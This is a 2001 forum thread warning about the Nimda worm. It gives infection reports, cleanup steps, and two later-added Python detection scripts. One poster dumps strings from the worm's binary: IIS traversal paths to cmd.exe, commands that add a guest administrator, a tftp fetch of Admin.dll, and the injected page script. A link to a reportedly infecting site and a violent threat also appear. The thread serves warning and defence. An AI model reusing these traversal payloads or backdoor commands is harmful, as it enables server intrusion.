VIRUS Alert!!


toker
09-18-2001, 01:36 PM
I just received a virus that will try to auto-download/run when you open the email.

I don't know much about it yet and haven't seen any reports about it anywhere, but I just received it 5 mins ago. It appears to create a new Guest user on the infected box, then add some network changes in the registry.

It also will take control of IIS, then start transmitting emails based on the template below, which may help you to filter the filenames.

Anything you receive with readme(*).exe should be deleted immediately!!

Subject: From: < DATA
RCPT TO: < >
MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe \\ octet


According to some tags inside the source it's called: Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0

Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

Received: from PCAJ (213.237.104.88.adsl.hvi.worldonline.dk [213.237.104.88])
Return-Path: <info@notonlywine.com>

Energy Hosting
09-18-2001, 02:02 PM
You may find this useful:

http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0109&L=ntbugtraq&F=P&S=&P=1747

Some hosts are down because of this.

andy2000
09-18-2001, 02:05 PM
The FBI just said something about a new virus.

toker
09-18-2001, 02:38 PM
Well, I seem to be one of the first to get it. Lucky I have everything disabled so it can't do shit to me.

Apparently this thing even changes the settings in Bind and Networking prefs, all via registry hacks, so NT and Win2k users could be at greatest risk. It's pretty slick code compared to Code Red, which was kinda sloppy and more based on the code of the Millennium Worm.

Only problem is, if word doesn't spread fast we'll have the same shit as before, and I don't think the FBI has time to worry about this shit right now. Best thing is if everyone who reads this just passes the word around to their hosts and friends ASAP.

trip
09-18-2001, 04:00 PM
Fuck! this site is propagating the VIRUS!!
SOMEONE CALL THE FBI !!

http://204.134.115.5/ LOL

some guy just entered a chat room and spammed it a few times then left...

now I'm fucked..

BEWARE - it will automatically run an EXE file called readme.exe and will try to connect to the net... lucky I have ZoneAlarm that alerted me of this file trying to call home or something...

DO NOT LOAD THAT PAGE IF YOU HAVE OUTLOOK INSTALLED -

FUCK MICROSOFT!!

shunga
09-18-2001, 06:09 PM
I received two of those emails. I had no idea what they were, but when I pressed cancel when prompted to open or save, Outlook crashed. I had a hard time deleting them. I hope the FBI catch these people and put them in jail for a very long time. I'm sick of this garbage.

shunga
09-18-2001, 06:18 PM
Is it possible to stop Outlook from handling the attachment when you select the email?

battuss
09-18-2001, 06:47 PM
Originally posted by trip:
Fuck! this site is propagating the VIRUS!!
SOMEONE CALL THE FBI !!

http://204.134.115.5/ LOL

some guy just entered a chat room and spammed it a few times then left...

now I'm fucked..

BEWARE - it will automatically run an EXE file called readme.exe and will try to connect to the net... lucky I have ZoneAlarm that alerted me of this file trying to call home or something...

DO NOT LOAD THAT PAGE IF YOU HAVE OUTLOOK INSTALLED -

FUCK MICROSOFT!!

Uhm dude, WTF!!!!!! What do you mean? That page loads a virus or what??? First you give a link and then you say don't click it. Well of course I clicked before I read on. A wav file popped up???

theo
09-18-2001, 06:47 PM
Originally posted by shunga:
Is it possible to stop Outlook from handling the attachment when you select the email?

good question

shane94
09-18-2001, 06:50 PM
I have Outlook set to delete anything on the server that is bigger than 100kb. How big is the file?

Shane

battuss
09-18-2001, 06:59 PM
Goddamnit, I'm infected by the virus!!!!
What asshole posts a link to a virus on a message board! Geesh, somebody kick this guy's nuts!!!!

jefrbord20
09-18-2001, 07:04 PM
damn shit, I've visited an mp3 site and now I'm infected..

I've bought the latest version of McAfee to disinfect my comp, but actually they didn't find a solution to clean up the infected files..

my infected files:
c:\windows\system\load.exe
c:\windows\system\riched20.dll
and all the pages from the mp3 site
stored in
c:\windows\Temporary Internet Files\content.IE5

anyone know if it's dangerous to delete load.exe and riched20.dll? I don't want to crash my Windows.

tanin
09-18-2001, 07:22 PM
Guys, Linux is waiting for you !!!

shane
09-18-2001, 08:07 PM
long live Netscape

TwinTone
09-18-2001, 09:07 PM
Like I have said a thousand times.. run Linux / UNIX

All my sites are up! =)

theo
09-18-2001, 09:26 PM
i'm glad i didnt click that link!!!!!!!!

Arthur
09-18-2001, 10:01 PM
Originally posted by shane94:
I have Outlook set to delete anything on the server that is bigger than 100kb. How big is the file?

Shane

79,000 bytes.

Anyone know how to decode something base64-encoded? I'm curious to learn how this shit works.

'Plat
09-18-2001, 10:04 PM
I'm infected as hell with it right now and it keeps sending out emails to people that aren't even in my address book.

this is fucked up

Alex From San Diego
09-18-2001, 10:24 PM
Two of our machines were infected by this shit virus. It will spread like wildfire. Just wipe your machine out and reinstall everything. Hopefully you have everything backed up : )) We had something like 2000 files infected. Get Norton Antivirus 2001 and protect your email. Make sure you set your security for ActiveX to prompt.

Now if I ever catch this fuckin loser who invented this virus, I'll personally cut his nuts and dick off and shove them up his ass.
What kind of a loser this person must be.

Oh one more thing, there was some cocksucker who planted a backdoor virus on me sometime ago and I have a good idea on who it is, so basically be warned that if our paths cross in the future, be ready to pick your teeth off the floor. Have a good day.

LEON
09-18-2001, 10:26 PM
Unfortunately, I visited this fucked-up website too, but I restarted Windows while downloading, so that worked..
I know it is not the best way but well, at least it works

toker
09-18-2001, 10:41 PM
Arthur, I already have most of the code that does the damage; however I don't think an anti-virus update will be ready anytime soon. It's all in Microsux hands this time because their shit patches obviously were proven worthless.

To prevent infection: Outlook uses IE settings, so if you have VB and Active files set to prompt you would be safe. This thing uses code like the Active Dialers, but a little slicker, to plant itself on your system.

The fix would be fairly complex due to the network and IIS settings involved and may even require a format for most users.

Here is some of the code to help you figure out what it has done, so advanced users can reverse the damage; however, if you screw up your system don't bitch at me. You can also give some of this info to your hosts so they can add this to their mail filters.

If your host won't filter this shit then find a new host, because they are just adding to the problem, and it's not very hard to filter the shit when all the required info is right here for everyone.

I'm not gonna post all the data used because it's not needed for anything but to deploy the commands, and it could be abused in many ways, and I know some of you will do just that to get traffic.


System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>



--====_ABC1234567890DEF_====

NUL=

[rename]
\wininit.ini C:\ Personal Software\Microsoft\Windows\CurrentVersion\Explorer \Shell Folders \ .. \*.*  € €EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Sha res\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add net HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer \Advanced

Process Counter 009 software\microsoft\windows nt\currentversion\perflib\009 Counters Version Last Counter software\microsoft\windows nt\currentversion\perflib /scripts /MSADC /c /d /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> /Admin.dll dir GET %s HTTP/1.0
Host: www
Connnection: close

c: readme main index default html .asp .htm \readme.eml .exe mep winzip32.exe riched20.dll .nws .eml .doc .exe dontrunold ioctlsocket gethostbyname gethostname inet_ntoa inet_addr ntohl htonl ntohs htons closesocket select sendto send recvfrom recv bind connect socket __WSAFDIsSet WSACleanup WSAStartup ws2_32.dll MAPILogoff MAPISendMail MAPIFreeBuffer MAPIReadMail MAPIFindNext MAPIResolveName MAPILogon MAPI32.DLL WNetAddConnection2A WNetCancelConnection2A WNetOpenEnumA WNetEnumResourceA WNetCloseEnum MPR.DLL ShellExecuteA SHELL32.DLL RegisterServiceProcess VirtualFreeEx VirtualQueryEx VirtualAllocEx VirtualProtectEx CreateRemoteThread HeapCompact HeapFree HeapAlloc HeapDestroy HeapCreate KERNEL32.DLL SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Type Remark X:\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\ LanMan\X$ Parm2enc Parm1enc Flags Path SOFTWARE\Microsoft\Windows\CurrentVersion\Network\ LanMan\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\ LanMan SYSTEM\CurrentControlSet\Services\lanmanserver\Sha res
Cache Software\Microsoft\Windows\CurrentVersion\Explorer \MapMail QUIT
.
Subject: From: < DATA
RCPT TO: < >
MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe \\ octet
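The MIME layout toker quoted above (an HTML body whose zero-size iframe pulls in a cid: part that is declared audio/x-wav but named readme.exe, the content-type mismatch that unpatched IE/Outlook acted on before MS01-020) is something a mail gateway can check mechanically. The script below is an added example written for this thread, not code from any poster and not the worm's own code. It parses a message constructed to mirror the quoted template (same headers, boundaries and Content-ID); the base64 body is a labelled placeholder string, not a binary. It also shows what shane94 and Arthur asked about: decoding the base64 part and measuring its size.

```python
import base64
import email
import re
from email import policy

# Executable extensions worth flagging when they arrive under a non-application
# content type (the audio/x-wav + readme.exe pairing quoted in the thread).
EXEC_EXTENSIONS = (".exe", ".com", ".pif", ".scr", ".bat", ".vbs")

# An <iframe> whose src is a cid: reference pulls another MIME part into the
# HTML body; with height=0 width=0 it loads invisibly when the mail is viewed.
IFRAME_CID_RE = re.compile(r'<iframe[^>]*\bsrc=["\']?cid:([^\s"\'>]+)', re.IGNORECASE)

# Constructed stand-in for the attachment body: a tagged string, NOT a real binary.
FAKE_PAYLOAD = b"MZ-constructed-placeholder-not-a-real-binary"

# Constructed sample message with the MIME layout quoted in the thread.
SAMPLE_RAW = """From: <info@example.invalid>
To: <victim@example.invalid>
Subject: readme
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

{payload}
--====_ABC1234567890DEF_====--
""".format(payload=base64.b64encode(FAKE_PAYLOAD).decode("ascii"))


def audit_message(raw):
    """Parse one RFC 822 message; return its attachments and a list of findings."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings, attachments = [], []
    cid_refs, parts_by_cid = set(), {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        filename = part.get_filename()  # also reads the Content-Type "name" parameter
        cid = part.get("Content-ID")
        if cid:
            parts_by_cid[cid.strip().strip("<>")] = part
        if ctype == "text/html":
            # get_content() undoes the quoted-printable encoding of the HTML body
            for match in IFRAME_CID_RE.finditer(part.get_content()):
                cid_refs.add(match.group(1))
        if filename:
            data = part.get_payload(decode=True)  # undoes the base64 transfer encoding
            attachments.append({"filename": filename, "content_type": ctype,
                                "size": len(data), "magic": data[:2]})
            if filename.lower().endswith(EXEC_EXTENSIONS) and not ctype.startswith("application/"):
                findings.append("attachment %r declared as %s: type/extension mismatch"
                                % (filename, ctype))
    for ref in sorted(cid_refs):
        target = parts_by_cid.get(ref)
        name = (target.get_filename() or "") if target is not None else ""
        if name.lower().endswith(EXEC_EXTENSIONS):
            findings.append("HTML iframe auto-loads cid:%s, which is the executable part %r"
                            % (ref, name))
    return {"attachments": attachments, "findings": findings}


if __name__ == "__main__":
    report = audit_message(SAMPLE_RAW)
    for att in report["attachments"]:
        print("attachment", att["filename"], att["content_type"], att["size"], "bytes")
    for line in report["findings"]:
        print("FLAG:", line)
```

Either finding on its own is enough to quarantine at the gateway: an executable extension under a media content type, or an HTML body that auto-loads an executable part through a cid: iframe. The size and the first two bytes of the decoded part (an `MZ` prefix marks a Windows executable) give a quick sanity check independent of the declared content type.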

toker
09-18-2001, 10:51 PM
I tell you guys what: if you have mIRC or use any form of IRC client, you can connect to irc.dal.net and go to channel #nohack. These guys should have a fix real soon and they are great people who work not for profit on this kind of thing.

I'm gonna send them the file if they don't have it already, and also you can go to http://www.nohack.net or http://www.infowar.com for lots of useful info related to the latest exploits.

Don't format your PC as of yet if you are infected; give me till tomorrow evening to see if we can't get a fix or at the very least cripple the damn thing until a fix is available.

Just to show the LOVE that comes from the USA and how us Americans take their time to help others in all times of need!!

toker
09-18-2001, 11:08 PM
OK, I asked UncaHeLL from DALnet's #nohack to join us on this issue. If he saves your machine you better make good for him; he says he will work on a fix.

Maybe some small donations, I think, would be a nice gesture, since these guys do this on their own time just because they are nice, caring folks.

virushelp
09-19-2001, 12:28 AM
Hello all,
I obtained copies of the new Nimda Worm today and it appears it is also infecting security-patched IIS webservers and Internet Explorer version 5.5. General tip here: use Netscape or Opera to view suspect sites, disable Java and ActiveX in Internet Explorer and run the MS critical updates often.

On analysis it creates a few different files and has a few different infection methods. Let's forget the infection methods and get on with the quick clean up and back to normality.

OK first off if you have become infected we need to kill the process that is running and stop it from restarting again.

If you visit www.lockdowncorp.com (http://www.lockdowncorp.com) and dload lockdown millennium and install it we have the beginning of a cleanup.

You may need to reboot if the worm has consumed all your resources.

OK with LockDown installed double click on the yellow lock in your system tray and when LockDown appears on your screen click on the GENERICS button and you will see your start up programs.

If you are running Win2k or NT look for Mmc.exe in the list and remove from startup and you will see a startup for SYSTEM.INI which also needs removing. Next click on the tab that says LIST SERVERS and kill Mmc.exe.

If you are running Win95/98 look for Load.exe in the list and remove from startup and you will see a startup for SYSTEM.INI which also needs removing. Next click on the tab that says LIST SERVERS and kill Load.exe.

Now with all versions of Windows you may see Mep****.TMP.exe running, this must also be killed.

Now for the fun part :

First of all make sure you can view hidden and system files. To enable this go to Start, Settings and Folder Options and then click on View Tab. For NT users do Tools, Folder Options from inside an Explorer window.
Once in there check Show Hidden Files and Folders and then uncheck Hide extensions for known file types.

When finished click apply and exit that window.

Now go to Start, Find, Files and Folders.

Search for and delete any of the following files that you find if you are infected. If you find just mmc.exe or riched20.dll you may not be infected.

load.exe
mmc.exe
riched20.dll
readme.eml
readme.exe

Go into Windows and Temp and click on 1 file and hold down CTRL and click A. This will select all files. Now delete the contents of the temporary folder including read-only files. You don't need any of these files anyway.

Nimda infects *.html, *.htm and *.asp docs as well, so look for this line in any of these docs:
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

and remove it or if the webserver you are using is not infected dload clean backups from the server.

Finishing up

Now click on Shares in lockdown and you will be asked whether to start in advanced mode or not. Say yes restart, in advanced mode. If Nimda spawned fileshares on your computer you are going to get unpassworded shares warnings. This means you have hidden C$, D$ shares etc and the shares need disabling or unsharing. With open shares anyone has access to any files on your drive and you are also open to secondary infections. Network computers will also possibly be infected so unplug them from the network until you have cleaned them to prevent them reinfecting the ones you have just cleaned.

MMC.EXE and RICHED20.DLL are both legitimate Windows files and need replacing with clean copies. Without Riched20.dll most text items will not open. Be sure these are clean files from trusted sites or sources.

Finally scan the system with LockDown for secondary infections from possibly having open fileshares.

Once you have done this you should be back in business and no longer spreading. I would advise closing IIS Service if you really do not need to use it until a proper fix is made available. New Updated File signatures for LockDown will be available by 1 PM EST Today so update the file sigs and scan every drive for remnants.

All the Best
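The file-level part of virushelp's cleanup (hunt for the dropped files, find every *.html, *.htm and *.asp page carrying the injected window.open("readme.eml") line, strip it) is repetitive on a web root of any size, so here is an added example that does it as a script. This is not virushelp's tool or anything from the thread; it assumes the marker string exactly as quoted in the post, and the directory tree it scans is constructed in a temp folder with placeholder files. Note that mmc.exe and riched20.dll are also legitimate Windows files, as virushelp says, so the script lists those separately for verification instead of calling them infections.

```python
import os
import re
import tempfile
from pathlib import Path

# The line virushelp says the worm appends to web pages. Whitespace is allowed
# around the commas and tags so minor variations in the injected text still match.
INJECTION_RE = re.compile(
    r'<html>\s*<script language="JavaScript">\s*window\.open\("readme\.eml",\s*null,\s*'
    r'"resizable=no,top=6000,left=6000"\)\s*</script>\s*</html>',
    re.IGNORECASE,
)
WEB_EXTENSIONS = {".html", ".htm", ".asp"}
# From virushelp's delete list. mmc.exe and riched20.dll are also legitimate
# Windows files, so they are reported for verification rather than as proof.
DROPPED_NAMES = {"load.exe", "readme.eml", "readme.exe"}
LEGIT_NAMES = {"mmc.exe", "riched20.dll"}

# Exact marker as quoted in the post; used only to build the constructed sample.
MARKER = ('<html><script language="JavaScript">window.open("readme.eml", null, '
          '"resizable=no,top=6000,left=6000")</script></html>')


def strip_injection(text):
    """Remove every injected marker; return (cleaned_text, number_removed)."""
    return INJECTION_RE.subn("", text)


def scan_tree(root, clean=False):
    """Walk root: report infected pages, dropped files and files needing a check.

    With clean=True the marker is stripped from infected pages in place.
    """
    infected_pages, dropped_files, verify_files = [], [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            lower = name.lower()
            if lower in DROPPED_NAMES:
                dropped_files.append(str(path))
            elif lower in LEGIT_NAMES:
                verify_files.append(str(path))
            if path.suffix.lower() in WEB_EXTENSIONS:
                # latin-1 decodes any byte, so odd encodings cannot abort the scan
                text = path.read_text(encoding="latin-1")
                cleaned, removed = strip_injection(text)
                if removed:
                    infected_pages.append(str(path))
                    if clean:
                        path.write_text(cleaned, encoding="latin-1")
    return {"infected_pages": sorted(infected_pages),
            "dropped_files": sorted(dropped_files),
            "verify_files": sorted(verify_files)}


def build_sample_tree():
    """Constructed web root in a temp dir: one injected page, one clean page,
    a dropped readme.eml and a riched20.dll placeholder. Returns the root path."""
    root = Path(tempfile.mkdtemp(prefix="nimda_demo_"))
    (root / "sub").mkdir()
    (root / "index.html").write_text("<html><body>hello</body></html>\n" + MARKER + "\n",
                                     encoding="latin-1")
    (root / "sub" / "about.htm").write_text("<html><body>clean</body></html>\n",
                                            encoding="latin-1")
    (root / "sub" / "readme.eml").write_text("constructed placeholder, not a mail file\n",
                                             encoding="latin-1")
    (root / "sub" / "riched20.dll").write_bytes(b"constructed placeholder")
    return str(root)


if __name__ == "__main__":
    root = build_sample_tree()
    print("before:", scan_tree(root))
    scan_tree(root, clean=True)
    print("after: ", scan_tree(root))
```

Run it once without `clean=True` to get the inventory, delete or replace the files it lists, and only then run it with `clean=True`. Pages it cleans still deserve a diff against a known-good backup, since the script removes only the quoted marker and not anything else the page may have been changed to.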

toker
09-19-2001, 12:42 AM
Now make sure you know what you are doing, or find someone to help you if you don't!


Thanks to virushelp for taking his time to register and post this info, much appreciated.

virushelp
09-19-2001, 01:02 AM
Forgot to mention Admin.dll is also overwritten on Win2k/NT machines and must be replaced.

It's 2am and I'm tired, so forgive the lapse of memory. I've been working with this damn worm all day, infecting different platforms to watch its behaviour and check what files it creates to be able to effect removal.

All the Best

ChrisX
09-19-2001, 07:35 PM
If I just install the patch for Internet Explorer... I will never get the virus on the web?

or I must disable active-x?

Arthur
09-19-2001, 09:19 PM
I had both JavaScript and ActiveX disabled when I checked the link, and it didn't bite me.
Was also safe using the Opera browser, which actually let me harmlessly download the encoded virus.